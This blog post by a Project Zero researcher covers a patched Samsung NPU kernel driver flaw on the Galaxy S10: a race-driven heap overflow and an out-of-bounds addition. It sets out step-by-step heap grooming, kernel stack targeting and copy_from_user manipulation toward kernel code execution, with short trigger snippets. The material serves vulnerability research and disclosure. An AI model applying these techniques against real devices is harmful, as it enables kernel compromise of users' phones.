Reading view

There are new articles available, click to refresh the page.

An iOS hacker tries Android

Written by Brandon Azad, when working at Project Zero

One of the amazing aspects of working at Project Zero is having the flexibility to direct my own research agenda. My prior work has almost exclusively focused on iOS exploitation, but back in August, I thought it could be interesting to try writing a kernel exploit for Android to see how it compares. I have two aims for this blog post: First, I will walk you through my full journey from bug description to kernel read/write/execute on the Samsung Galaxy S10, starting from the perspective of a pure-iOS security researcher. Second, I will try to emphasize some of the major security/exploitation differences between the two platforms that I have observed.

You can find the fully-commented exploit code attached in issue 2073.

In November 2020, Samsung released a patch addressing the issue for devices that are eligible for receiving security updates. This issue was assigned CVE-2020-28343 and a Samsung-specific SVE-2020-18610.

The initial vulnerability report

In early August, fellow Google Project Zero researcher Ben Hawkes reported several vulnerabilities in the Samsung Neural Processing Unit (NPU) kernel driver due to a complete lack of input sanitization. At a high level, the NPU is a coprocessor dedicated to machine learning and neural network computations, especially for visual processing. The bugs Ben found were in Samsug's Android kernel driver for the NPU, responsible (among other things) for sending neural models from an Android app in userspace over to the NPU coprocessor.

The following few sections will look at the vulnerabilities. These bugs aren't actually that interesting: they are quite ordinary out-of-bounds writes due to unsanitized input, and could almost be treated as black-box primitives for the purposes of writing an exploit (which was my ultimate goal). The primitives are quite strong and, to my knowledge, no novel techniques are required to build a practical exploit out of them in practice. However, since I was coming from the perspective of never having written a Linux kernel exploit, understanding these bugs and their constraints in detail was crucial for me to begin to visualize how they might be used to gain kernel read/write.

🤖 📱 🧠 👓 🐛🐛

The vulnerabilities are reached by opening a handle to the device /dev/vertex10, which Ben had determined is accessible to a normal Android app. Calling open() on this device causes the kernel to allocate and initialize a new npu_session object that gets associated with the returned file descriptor. The process can then invoke ioctl() on the file descriptor to interact with the session. For example, consider the following code:

int ncp_fd = open("/dev/vertex10", O_RDONLY);

struct vs4l_graph vs4l_graph = /* ioctl data */;

ioctl(ncp_fd, VS4L_VERTEXIOC_S_GRAPH, &vs4l_graph);

The preceding syscalls will result in the kernel calling the function npu_vertex_s_graph(), which calls npu_session_s_graph() on the associated npu_session (see drivers/vision/npu/npu-vertex.c). npu_session_s_graph() then calls __config_session_info() to parse the input data to this ioctl (see npu-session.c):

int __config_session_info(struct npu_session *session)



    ret = __pilot_parsing_ncp(session, &temp_IFM_cnt, &temp_OFM_cnt, &temp_IMB_cnt, &WGT_cnt);

    temp_IFM_av = kcalloc(temp_IFM_cnt, sizeof(struct temp_av), GFP_KERNEL);

    temp_OFM_av = kcalloc(temp_OFM_cnt, sizeof(struct temp_av), GFP_KERNEL);

    temp_IMB_av = kcalloc(temp_IMB_cnt, sizeof(struct temp_av), GFP_KERNEL);


    ret = __second_parsing_ncp(session, &temp_IFM_av, &temp_OFM_av, &temp_IMB_av, &WGT_av);



As can be seen above, __config_session_info() calls two other functions to perform the actual parsing of the input: __pilot_parsing_ncp() and __second_parsing_ncp(). As their names suggest, __pilot_parsing_ncp() performs a preliminary "pilot" parsing of the input data in order to compute the sizes of a few arrays that will need to be allocated for the full parsing; meanwhile, __second_parsing_ncp() performs the full parsing, populating the arrays that were just allocated.

Let's take a quick look at __pilot_parsing_ncp():

int __pilot_parsing_ncp(struct npu_session *session, u32 *IFM_cnt, u32 *OFM_cnt, u32 *IMB_cnt, u32 *WGT_cnt)



    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;

    ncp = (struct ncp_header *)ncp_vaddr;

    memory_vector_offset = ncp->memory_vector_offset;

    memory_vector_cnt = ncp->memory_vector_cnt;

    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);

    for (i = 0; i < memory_vector_cnt; i++) {

        u32 memory_type = (mv + i)->type;

        switch (memory_type) {

        case MEMORY_TYPE_IN_FMAP:





        case MEMORY_TYPE_OT_FMAP:








    return ret;


There are a few things to note here.

First, the input data is being parsed from a buffer pointed to by the field session->ncp_mem_buf->vaddr. This turns out to be an ION buffer, which is a type of memory buffer shareable between userspace, the kernel, and coprocessors. The ION interface was introduced by Google into the Android kernel to facilitate allocating device-accessible memory and sharing that memory with various hardware components, all without needing to copy the data between buffers. In this case, the userspace app will initialize the model directly inside an ION buffer, and then the model will be mapped directly into the kernel for pre-processing before the ION buffer's device address is sent to the NPU to perform the actual work.

The important takeaway from this first observation is that the session->ncp_mem_buf->vaddr field points to an ION buffer that is currently mapped into both userspace and the kernel: that is, it's shared memory.

The second thing to note in the function __pilot_parsing_ncp() is that the only thing it does is count the number of times each type of element appears in the memory_vector array in the shared ION buffer. Each memory_vector element has an associated type, and this function simply tallies up the number of times it sees each type, and nothing else. There isn't even a failure case for this function.

This is interesting for a few reasons. For one, there's no input sanitization to ensure that memory_vector_cnt (which is read directly from the shared memory buffer and thus is attacker-controlled) is a sane value. It could be 0xffffffff, leading the for loop to process memory_vector elements off the end of the ION buffer. Probably a kernel crash at worst, but it's certainly an indication of unfuzzed code.

More importantly, since only the count of each type is stored, it seems likely that this code is setting itself up for a double-read, time-of-check-to-time-of-use (TOCTOU) issue when it later processes the memory_vectors a second time. Each of the returned counts is used to allocate an array in kernel memory (see __config_session_info()). But because the memory_vector_cnt and types reside in shared memory, they could be changed by code running in userspace between __pilot_parsing_ncp() and __second_parsing_ncp(), meaning that the second function is passed incorrectly sized arrays for the memory_vector data it eventually sees in the shared buffer.

Of course, to determine whether this is actually a bug, we have to look at the implementation of __second_parsing_ncp():

int __second_parsing_ncp(

    struct npu_session *session,

    struct temp_av **temp_IFM_av, struct temp_av **temp_OFM_av,

    struct temp_av **temp_IMB_av, struct addr_info **WGT_av)


    ncp_vaddr = (char *)session->ncp_mem_buf->vaddr;

    ncp_daddr = session->ncp_mem_buf->daddr;

    ncp = (struct ncp_header *)ncp_vaddr;

    address_vector_offset = ncp->address_vector_offset;

    address_vector_cnt = ncp->address_vector_cnt;


    memory_vector_offset = ncp->memory_vector_offset;

    memory_vector_cnt = ncp->memory_vector_cnt;

    mv = (struct memory_vector *)(ncp_vaddr + memory_vector_offset);

    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);


    for (i = 0; i < memory_vector_cnt; i++) {

        u32 memory_type = (mv + i)->type;

        u32 address_vector_index;

        u32 weight_offset;

        switch (memory_type) {

        case MEMORY_TYPE_IN_FMAP:


            address_vector_index = (mv + i)->address_vector_index;

            if (!EVER_FIND_FM(IFM_cnt, *temp_IFM_av, address_vector_index)) {

                (*temp_IFM_av + (*IFM_cnt))->index = address_vector_index;

                (*temp_IFM_av + (*IFM_cnt))->size = (av + address_vector_index)->size;

                (*temp_IFM_av + (*IFM_cnt))->pixel_format = (mv + i)->pixel_format;

                (*temp_IFM_av + (*IFM_cnt))->width = (mv + i)->width;

                (*temp_IFM_av + (*IFM_cnt))->height = (mv + i)->height;

                (*temp_IFM_av + (*IFM_cnt))->channels = (mv + i)->channels;

                (mv + i)->stride = 0;

                (*temp_IFM_av + (*IFM_cnt))->stride = (mv + i)->stride;







        case MEMORY_TYPE_WEIGHT:


            // update address vector, m_addr with ncp_alloc_daddr + offset

            address_vector_index = (mv + i)->address_vector_index;

            weight_offset = (av + address_vector_index)->m_addr;

            if (weight_offset > (u32)session->ncp_mem_buf->size) {

                ret = -EINVAL;

                npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",

                    session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);

                goto p_err;


            (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;










Once again, there are several things to note here.

First off, it does indeed turn out that memory_vector_cnt is read a second time from the shared ION buffer, and there are no sanity checks to ensure that the arrays temp_IFM_av, temp_OFM_av, and temp_IMB_av are not filled beyond the counts for which they were each allocated. So this is indeed a linear heap overflow bug.

But secondly, when processing a memory_vector element of type MEMORY_TYPE_WEIGHT, it appears that there's another issue as well: A controlled 32-bit value address_vector_index is read from the memory_vector entry and used as an index into an address_vector array without any bounds checks. And not only is the out-of-bounds address_vector's m_addr field read, it's also written a few lines later after adding in the ION buffer's device address! So this is an out-of-bounds addition at a controlled offset.

These are the two most serious issues described in Ben's report to Samsung. We'll look at each in more detail in the following two sections in order to understand their constraints.

The heap overflow

How might the heap overflow be triggered?

First, __config_session_info() will call __pilot_parsing_ncp() to count the number of elements of each type in the memory_vector array in the shared ION buffer. Imagine that initially the value of ncp->memory_vector_cnt is 1, and the single memory_vector has type MEMORY_TYPE_IN_FMAP. Then __pilot_parsing_ncp() will return with IFM_cnt set to 1.

Next, __config_session_info() will allocate the temp_IFM_av with space for a single temp_av element.

Concurrently, a thread in userspace will race to change the value of ncp->memory_vector_cnt in the shared ION buffer from 1 to 100. The memory_vector now appears to have 100 elements, and userspace will ensure that the extra elements all have type MEMORY_TYPE_IN_FMAP as well.

Back in the kernel: After allocating the arrays, __config_session_info() will call __second_parsing_ncp() to perform the second stage of parsing. __second_parsing_ncp() will read memory_vector_cnt again, this time getting the value 100. Thus, in the for loop, it will try to process 100 elements from the memory_vector array, and each will be of type MEMORY_TYPE_IN_FMAP. Each iteration will populate another temp_av element in the temp_IFM_av array, and elements after the first will be written off the end of the array.

Furthermore, the out-of-bounds temp_av element's fields are written with contents read from the ION buffer, which means that the contents of the out-of-bounds write can be fully controlled (except for padding between fields).

This seems like an excellent primitive: we're performing an out-of-bounds write off the end of a kernel allocation of controlled size, and we can control both the size of the overflow and the contents of the data we write. This level of control means that it should theoretically be possible to place the temp_IFM_av allocation next to many different types of objects and control the amount of the victim object we overflow. Having such flexibility means that we can choose from a very wide selection of victim objects when deciding the easiest and most reliable exploit strategy.

The one thing to be aware of is that a simple implementation would probably win the race to increase memory_vector_cnt about 25% of the time. The reason for this is that it's probably tricky to get the timing of when to flip from 1 to 100 exactly right, so the simplest strategy is simply to have a user thread alternate between the two values continuously. If each of the reads in __pilot_parsing_ncp() and __second_parsing_ncp() reads either 1 or 100 randomly, then there's a 1 in 4 chance that the first read is 1 and the second is 100. The good thing is that nothing too bad happens if we lose the race: there's possibly a memory leak, but the kernel doesn't crash. Thus, we can just try this over and over until we win.

The out-of-bounds addition

Now that we've seen the heap overflow, let's look at the out-of-bounds addition primitive. Unlike the prior primitive, this one is a straightforward, deterministic out-of-bounds addition.

Once again, we'll initialize our ION buffer to have a single memory_vector element, but this time its type will be MEMORY_TYPE_WEIGHT. Nothing interesting happens in __pilot_parsing_ncp(), so we'll jump ahead to __second_parsing_ncp().

In __second_parsing_ncp(), address_vector_offset is read directly from the ION buffer without input validation. This is added to the ION buffer address to compute the address of an array of address_vector structs; since the offset was unchecked, this supposed address_vector array could lie entirely in out-of-bounds memory. And importantly, there are no alignment checks, so the address_vector array could start at any odd unaligned address we want.

    address_vector_offset = ncp->address_vector_offset;


    av = (struct address_vector *)(ncp_vaddr + address_vector_offset);

We next enter the for loop to process the single memory_vector entry, and jump to the case for MEMORY_TYPE_WEIGHT. This code reads the address_vector_index field of the memory_vector, which is again completely controlled and unvalidated. The (potentially out-of-bounds) address_vector element at the specified index is then accessed.

    // update address vector, m_addr with ncp_alloc_daddr + offset

    address_vector_index = (mv + i)->address_vector_index;

    weight_offset = (av + address_vector_index)->m_addr;

Reading the m_addr field (at offset 0x4 in address_vector) will thus possibly perform an out-of-bounds read.

But there's a check we need to pass before we can hit the out-of-bounds write:

    if (weight_offset > (u32)session->ncp_mem_buf->size) {

        ret = -EINVAL;

        npu_uerr("weight_offset is invalid, offset(0x%x), ncp_daddr(0x%x)\n",

            session, (u32)weight_offset, (u32)session->ncp_mem_buf->size);

        goto p_err;


Basically, what this does is compare the original value of the out-of-bounds read to the size of the ION buffer, and if the original value is greater than the ION buffer size, then __second_parsing_ncp() aborts without performing the write.

But, assuming that the original value is less than the ION buffer size, it gets updated by adding in the device address (daddr) of the ION buffer:

    (av + address_vector_index)->m_addr = weight_offset + ncp_daddr;

The device address is (presumably) the address at which a device could access the buffer; this could be a physical address, or if the system has an IOMMU in front of the hardware device performing the access, it would be an IOMMU-translated address. Essentially, this code expects that the m_addr field in the address_vector will initially be an offset from the start of the ION buffer, and it updates it into an absolute (device) address by adding the ION buffer's daddr.

So, if the original value at the out-of-bounds addition location is quite small, and in particular smaller than the ION buffer size, then this primitive will allow us to add in the ION buffer's daddr, making the value rather large instead.

"Hey Siri, how do I exploit Android?"

Everything described up to here comes more or less directly from Ben's initial report to Samsung. So: what now?

Even after reading Ben's initial report and looking at the NPU driver's source code to understand the bugs more fully, I felt rather lost as to how to proceed. As the title and intro to this post suggest, Android is not my area.

On the other hand, I have written a few iOS kernel exploits for memory corruption bugs before. Based on that experience, I suspected that both the heap overflow and the out-of-bounds addition could be exploited using straightforward applications of existing techniques, had the bugs existed on iOS. So I embarked on a thought experiment: what would the full exploit flows for each of these primitives be if the bugs existed on iOS instead of Android? My hope was that I might be able to draw parallels between the two, such that thinking about the exploit on iOS would inform how these bugs could be exploited on Android.

Thought experiment: an iOS heap overflow

So, imagine that an equivalent to the heap overflow bug existed on iOS; that is, imagine there were a race with a 25% win rate that allowed us to perform a fully controlled linear heap buffer overflow out of a controlled-size allocation. How could we turn this into arbitrary kernel read/write?

On iOS, the de-facto standard for a final kernel read/write capability has been the use of an object called a kernel task port. A task port is a handle that gives us control over the virtual memory of a task, and a kernel task port is a task port for the kernel itself. Thus, if you can construct a kernel task port, you can use standard APIs like mach_vm_read() and mach_vm_write() to read and write kernel memory from userspace.

Comparing this heap overflow to the vulnerabilities listed in the survey, the initial primitive is most similar to that granted by CVE-2017-2370, which was exploited by extra_recipe and Yalu102. Thus, the exploit flow would likely be quite similar to those existing iOS exploits. And to make our thought experiment even easier, we can put aside any concern about reliability and just imagine the simplest exploit flow that could work generically.

The most straightforward way to get a handle to a kernel task port using this primitive would likely be to overflow into an out-of-line Mach ports array and insert a pointer to a fake kernel task port, such that receiving the overflowed port array back in userspace grants us a handle to our fake port. This is essentially the strategy used by Yalu102, except that that exploit relies on the absence of PAN (i.e., it relies on being able to dereference userspace pointers from kernel mode). The same strategy should work on systems with PAN, it would just require a few extra steps.

Unfortunately, the first time we trigger the vulnerability to give ourselves a handle to a fake task port, we won't have all the information needed to immediately construct a kernel task port: we'd need to leak the addresses of a few important kernel objects, such as the kernel_map, first. Consequently, we would need to start first by giving ourselves a "vanilla" fake task port and then use that to read arbitrary kernel memory via the traditional pid_for_task() technique. Once we can read kernel memory, we would locate the relevant kernel objects to build the final kernel task port.

Now, since we'll need to perform multiple arbitrary reads using pid_for_task(), we need to be able to update the kernel address we want to read from. This can be a challenge because the pointer specifying the target read address lives in kernel memory. Fortunately, there already exist a few standard techniques for updating this pointer to read from new kernel addresses, such as reallocating the buffer holding the target read pointer (see the Chaos exploit), overlapping Mach ports in special ways that allow updating the target read address directly (see the v0rtex exploit), or placing the fake kernel objects in user/kernel shared memory (see the oob_timestamp exploit).

Finally, there will also be some complications from working around Apple's zone_require mitigation, which aims to block exactly these types of fake Mach port shenanigans. However, at least through iOS 13.3, it's possible to get around zone_require by operating with large allocations that live outside the zone_map (see the oob_timestamp exploit).

So, in summary, a very simplistic exploit flow for the heap overflow might look something like this:

  1. Spray large amounts of kernel memory with fake task ports and fake tasks, such that you can be reasonably sure that one fake object of each type has been sprayed to a specific hardcoded address. Use the oob_timestamp trick to bypass zone_require and place these fake objects in shared memory.
  2. Spray out-of-line Mach ports allocations, and poke holes between the allocations.
  3. Trigger the out-of-bounds write out of an allocation of the same size as the out-of-line Mach ports allocations, overflowing into the subsequent array of Mach ports and inserting the hardcoded pointer to the fake ports.
  4. Receive the out-of-line Mach port handles in userspace and check if there's a new task port handle; if not, go back to step 2.
  5. This handle is a fake task port that can be used to read kernel memory using pid_for_task(). Use this capability to find relevant kernel objects and update the fake task into a fake kernel task object.

Thought experiment: an iOS out-of-bounds addition

What about the out-of-bounds addition?

None of the bugs in the survey of iOS kernel exploits seem like a good comparison point: the most similar category would be linear heap buffer overflows, but these are much more limiting due to spatial locality. Nonetheless, I eventually settled on oob_timestamp as the best reference.

The vulnerability used by oob_timestamp is CVE-2020-3837, a linear heap out-of-bounds write of up to 8 bytes of timestamp data. However, this isn't the typical heap buffer overflow. Most heap overflows occur in small to medium sized allocations of up to 2 pages (0x8000 bytes); these allocations occur in a submap of the kernel virtual address space called the zone_map. Meanwhile, the out-of-bounds write in oob_timestamp occurs off the end of a pageable region of shared memory outside the zone_map, in the general kernel_map used for large, multi-page allocations or allocations with special properties (like pageable and shared memory).

The basic flow of oob_timestamp is as follows:

  1. Groom the kernel_map to allocate the pageable shared memory region, an ipc_kmsg, and an out-of-line Mach ports array contiguously. These are followed by a large number of filler allocations.
  2. Trigger the overflow to overwrite the first few bytes of the ipc_kmsg, increasing the size field.
  3. Free the ipc_kmsg, causing the subsequent out-of-line Mach ports array to also be freed.
  4. Reallocate the out-of-line Mach ports array with controlled data, effectively inserting fake Mach port pointers into the array. The pointer will be a pointer to a fake task port in the pageable shared memory region.
  5. Receive the out-of-line Mach ports in userspace, gaining a handle to the fake port.
  6. Overwrite the fake port in shared memory to make a fake task port and then read kernel memory using pid_for_task(). Find relevant kernel objects and update the fake task into a fake kernel task.

My thought was that you could basically use the out-of-bounds addition primitive as a drop-in replacement for the out-of-bounds timestamp write primitive in oob_timestamp. This seemed sensible because the initial primitive in oob_timestamp is only used to increase the size of an ipc_kmsg so that extra memory gets freed. Since all I need to do is bump an ipc_kmsg's size field, I felt that an out-of-bounds addition primitive should surely be suitable for this.

As it turns out, the constraints of the out-of-bounds addition are actually much tighter than I had imagined: the ipc_kmsg's size and the ION buffer's device address would need to be very carefully chosen to meet all the requirements. In spite of this oversight, oob_timestamp still proved a useful reference point for another reason: where the ION buffers get mapped in kernel memory.

Like iOS, Android also has multiple areas of virtual memory in which allocations can be made. kmalloc() is the standard allocation function used for most allocations. It's somewhat analogous to allocating using kalloc() on iOS: allocations can be less than a page in size and are managed via a dedicated allocation pool that's a bit like the zone_map. However, there's also a vmalloc() function for allocating "virtually contiguous memory". Unlike kmalloc(), vmalloc() allocates at page granularity and allocations occur in a separate region of kernel virtual memory somewhat analogous to the kernel_map on iOS.

The reason this matters is that the ION buffer on Android is mapped into the Linux kernel's vmalloc region. Thus, the fact that the out-of-bounds addition occurs off the end of a shared ION buffer mapped in the vmalloc area closely parallels how the oob_timestamp overflow occurs off the end of a pageable shared memory region in the kernel_map.

Choosing a path

At this point I still faced many unknowns: What allocation and heap shaping primitives were available on Android? What types of objects would be useful to corrupt? What would be Android's equivalent of the kernel task port, the final read/write capability? I had no idea.

One thing I did have was a hint at a good starting point: Both Ben and fellow Project Zero researcher Jann Horn had pointed out that along with the ION buffers, kernel thread stacks were also allocated in the vmalloc area, which meant that kernel stacks might be a good target for the out-of-bounds addition bug.

A diagram showing an ION buffer mapped directly before a userspace thread's kernel stack, with a guard page in between. The address_vector_offset is so large that it points past the end of the ION buffer and into the stack.

If the ION buffer is mapped directly before a kernel stack for a userspace thread, then the out-of-bounds addition primitive could be used to manipulate the stack.

Imagine that we could get a kernel stack for a thread in our process allocated at a fixed offset after the ION buffer. The out-of-bounds addition primitive would let us manipulate values on the thread's stack during a syscall by adding in the ION buffer's daddr, assuming that the initial values were sufficiently small. For example, we might make a blocking syscall which saves a certain size parameter in a variable, and once that syscall blocks and spills the size variable to the stack, we can use the out-of-bounds addition to make it very large; unblocking the syscall would then cause the original code to resume use the corrupted size value, perhaps passing it to a function like memcpy() to cause further memory corruption.

Using the out-of-bounds addition primitive to target values on a thread's kernel stack was appealing for one very important reason: in theory, this technique could dramatically reduce the amount of Linux-specific knowledge I'd need to develop a full exploit.

Most typical memory corruption exploits require finding specific objects that are interesting targets for corruption. For example, there are very few objects that could replace the ipc_kmsg in the oob_timestamp exploit, because the exploit relies on corrupting a size field stored at the very start of the struct; not many other objects have a size as their first field. So ipc_kmsg fills a very important niche in the arsenal of interesting objects to target with memory corruption, just as Mach ports fill a niche in useful objects to get a fake handle for.

Undoubtedly, there's a similar arsenal of useful objects to target for Android kernel exploitation. But by limiting ourselves to corrupting values on the kernel stack, we transform the set of all useful target "objects" into the set of useful stack frames to manipulate. This is a much easier set of target objects to work with than the set of all structs that could be allocated after the ION buffer because it doesn't require much Linux-specific knowledge to reason about semantics: We only need to identify relevant syscalls and look at the kernel binary in a disassembler to get a handle on what "objects" we have available to us.

Selecting the out-of-bounds addition primitive and choosing to target kernel thread stacks effectively solves the problem of finding useful kernel objects to corrupt by turning what would be a codebase-wide search into a simple enumeration of interesting stack frames in a disassembler without needing to learn much in the way of Linux internals.

Nevertheless, we are still left with two pressing questions: What allocation and heap shaping primitives do we have on Android? And what will be our final read/write capability to parallel the kernel task port?

Heap shaping

I started with the heap shaping primitive since it seemed the more tangible problem.

As previously mentioned, the vmalloc area is a region of the kernel's virtual address space in which allocations and mappings of page-level granularity can be made, comparable to the kernel_map on iOS. And just like how iOS provides a means of inspecting virtual memory regions in the kernel_map via vmmap, Linux provides a way of inspecting the allocations in the vmalloc area through /proc/vmallocinfo.

The /proc/vmallocinfo interface provides a simple textual description of each allocated virtual memory region inside the vmalloc area, including the start and end addresses, the size of the region in bytes, and some information about the allocation, such as the allocation site:

0xffffff8013bd0000-0xffffff8013bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013bd8000-0xffffff8013bdd000   20480 unpurged vm_area

0xffffff8013be0000-0xffffff8013be5000   20480 unpurged vm_area

0xffffff8013be8000-0xffffff8013bed000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013bed000-0xffffff8013cec000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc

0xffffff8013cec000-0xffffff8013eed000 2101248 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8013eed000-0xffffff8013fee000 1052672 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8013ff0000-0xffffff8013ff5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8013ff8000-0xffffff8013ffd000   20480 unpurged vm_area

0xffffff8014000000-0xffffff80140ff000 1044480 binder_alloc_mmap_handler+0xa4/0x1e0 vmalloc

0xffffff8014108000-0xffffff801410d000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

This gives us a way to visualize the vmalloc area and ensure that our allocations are grooming the heap as we want them to.

Our heap shaping needs to place a kernel thread stack at a fixed offset after the ION buffer mapping. By inspecting the kernel source code and the vmallocinfo output, I determined that kernel stacks consisted of 4 pages (0x4000 bytes) of data but also included a guard page after the allocation that was included in the size. Thus, my initial heap shaping idea was:

  1. Allocate large allocation of say 0x80000 bytes.
  2. Spray kernel stacks by creating new threads to fill up all 0x5000-byte holes in the vmalloc area before our large 0x80000-byte allocation.
  3. Free the large allocation. This should make an 0x80000-byte hole with no 0x5000-byte holes before it.
  4. Spray several more kernel stacks by creating new threads; these stacks should fall into the beginning of the hole, and also fill any earlier holes created by exiting threads from other processes.
  5. Map the ION buffer into the kernel by invoking the VS4L_VERTEXIOC_S_GRAPH ioctl, but without triggering the out-of-bounds addition. The ION buffer mapping should also fall into the hole.
  6. Spray more kernel stacks by creating new threads. These should fall into the hole as well, and one of them should land directly after the ION buffer.

Unfortunately, when I proposed this strategy to my teammates, Jann Horn pointed out a problem. In XNU, when you free a kernel_map allocation, that virtual memory region becomes immediately available for reuse. However, in Linux, freeing a vmalloc allocation usually just marks the allocation as freed without allowing you to immediately reclaim the virtual memory range; instead, the range becomes an "unpurged vm_area", and these areas are only properly freed and reclaimed once the amount of unpurged vm_area memory crosses a certain threshold. The reason Linux batches reclaiming freed virtual memory regions like this is to minimize the number of expensive global TLB flushes.

Consequently, this approach doesn't work exactly as we'd like: it's hard to know precisely when the unpurged vm_area allocations will be purged, so we can't be sure that we're reclaiming the hole to arrange our allocations. Nevertheless, it is possible to force a vm_area purge if you allocate and free enough memory. We just can't rely on the exact timing.

Even though the straightforward approach wouldn't work, Ben and Jann did help me identify a useful allocation site for spraying controlled-size allocations using vmalloc(). The function binder_alloc_mmap_handler(), which implements mmap() called on /dev/binder file descriptors, contains a call to get_vm_area() on the specific kernel version I was exploiting. Thus, the following sequence of operations would allow me to perform a vmalloc() of any size up to 4 MiB:

int binder_fd = open("/dev/binder", O_RDONLY);

void *binder_map = mmap(NULL, vmalloc_size,

        PROT_READ, MAP_PRIVATE, binder_fd, 0);

The main annoyance with this approach is that only a single allocation can be made using each binder fd; to make multiple allocations, you need to open multiple fds.

On my rooted Samsung Galaxy S10 test device, it appeared that the vmalloc area contained a lot of unreserved space at the end, in particular between 0xffffff8050000000 and 0xffffff80f0000000:

0xffffff804a400000-0xffffff804a800000 4194304 vm_map_ram

0xffffff804a800000-0xffffff804ac00000 4194304 vm_map_ram

0xffffff804ac00000-0xffffff804b000000 4194304 vm_map_ram

0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000

0xffffff80fafe0000-0xffffff80fede1000 65015808

0xffffff80fefe0000-0xffffff80ff5e1000 6295552

0xffffff8100d00000-0xffffff8100d3a000  237568 phys=0x0000000095000000

0xffffffbebfdc8000-0xffffffbebfe80000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

0xffffffbebfe80000-0xffffffbebff38000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

0xffffffbebff38000-0xffffffbebfff0000  753664 pcpu_get_vm_areas+0x0/0x744 vmalloc

Thus, I came up with an alternative strategy to place a kernel thread stack after the ION buffer mapping:

  1. Open a large number of /dev/binder fds.
  2. Spray a large amount of vmalloc memory using the binder fds and then close them, forcing a vm_area purge. We can't be sure of exactly when this purge occurs, so some unpurged vm_area regions will still be left. But forcing a purge will expose any holes at the start of the vmalloc area so that we can fill them in the next step. This prevents these holes from opening up at a later stage, messing up the groom.
  3. Now spray many allocations to the binder fds in decreasing sizes: 4 MiB, 2 MiB, 1 MiB, etc., all the way down to 0x4000 bytes. The idea is to efficiently fill holes in the vmalloc heap so that we eventually start allocating from clean virtual address space, like the 0xffffff8050000000 region identified earlier. The first binder vmallocs will fill the large holes, then later allocs will fill smaller and smaller holes, until eventually all 0x5000-byte holes are filled. (It is 0x5000 not 0x4000 because the allocations have a guard page at the end.)
  4. Now create some user threads. The threads' kernel stacks will allocate their 0x4000-byte stacks (which are 0x5000-byte reservations with the guard page) from the fresh virtual memory area at the end of the vmalloc region.
  5. Now trigger the vulnerable ioctl to map the ION buffer into the vmalloc region. If the ION buffer is chosen to have size 0x4000 bytes, it will also be placed in the fresh virtual memory area at the end of the vmalloc region.
  6. Finally, create some more user threads. Once again, their kernel stacks will be allocated from the fresh VA space, and they will thus be placed directly after the ION buffer, achieving our goal.

This technique actually seemed to work reasonably well. By dumping /proc/vmallocinfo at each step, it's possible to check that the kernel heap is being laid out as we hope. And indeed, it did appear that we were getting the ION buffer allocated directly before kernel thread stacks:

0xffffff8083ba0000-0xffffff8083ba5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083ba8000-0xffffff8083bad000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bad000-0xffffff8083bb2000   20480 ion_heap_map_kernel+0x110/0x16c vmap

0xffffff8083bb8000-0xffffff8083bbd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bc0000-0xffffff8083bc5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bc8000-0xffffff8083bcd000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff8083bd0000-0xffffff8083bd5000   20480 _do_fork+0x88/0x398 pages=4 vmalloc

0xffffff80f9e00000-0xffffff80faa00000 12582912 phys=0x00000009ef800000

0xffffff80fafe0000-0xffffff80fede1000 65015808

0xffffff80fefe0000-0xffffff80ff5e1000 6295552

Stack manipulation

At this point we can groom the kernel heap to place the kernel stack for one of our process's threads directly after the ION buffer, giving us the ability to manipulate the thread's stack while it is blocked in a syscall. The next question is what we should manipulate?

In order to answer this, we really need to understand the constraints of our bug. As discussed above, our primitive is the ability to perform an out-of-bounds addition on a 32-bit unsigned value, adding in the ION buffer's device address (daddr), so long as the original value being modified is less than the ION buffer's size.

The code in npu-session.c performs a copious amount of logging, so it's possible to check the address of the ION allocation from a root shell using the following command:

cat /proc/kmsg | grep ncp_ion_map

In my early tests, the ION buffer's daddr was usually between 0x80500000 and 0x80700000, and always matched the masks 0x80xx0000. If we use a size of 0x4000 for our ION buffer, then that means our primitive will transform a small positive value on the stack into a very large positive (unsigned) or negative (signed) value; for example, we might transform 0x1000 into 0x80611000.

How would we use this to gain code execution? Jann suggested a very interesting trick that could block calls to the functions copy_from_user() and copy_to_user() for arbitrary amounts of time, which could greatly expand the set of block points available during system calls.

copy_from_user() and copy_to_user() are the Linux equivalents of XNU's copyin() and copyout(): They are used to copy memory from userspace into the kernel (copy_from_user()) or to copy memory from the kernel into userspace (copy_to_user()). It's well known that these operations can be blocked by using tricks involving userfaultfd, but this won't be available to us in an exploit from app context. Nevertheless, Jann had discovered that similar tricks could be done using proxy file descriptors (an abstraction over FUSE provided by system_server and vold), essentially allowing page faults on userspace pages to be blocked for arbitrary amounts of time.

One particularly interesting target while blocking a copy_from_user() operation would be copy_from_user() itself. When copy_from_user() performs the actual copy operation in __arch_copy_from_user(), the first access to the magical blocking memory region will trigger a page fault, causing an exception to be delivered and spilling all the registers of __arch_copy_from_user() to the kernel stack while the fault is being processed. During that time, we could come in on another thread using our out-of-bounds addition to increase the size argument to __arch_copy_from_user() where it is spilled onto the stack. That way, once we service the page fault via the proxy file descriptor and allow the exception to return, the modified size value will be popped back into the register and __arch_copy_from_user() will copy more data than expected into kernel memory. If the buffer being copied into lives on the stack, this gives us a deterministic controlled stack buffer overflow that we can use to clobber a return address and get code execution. And the same idea can be applied to copy_to_user() to copy extra memory out of the kernel instead, disclosing kernel stack contents and allowing us to break KASLR and leak the stack cookie.

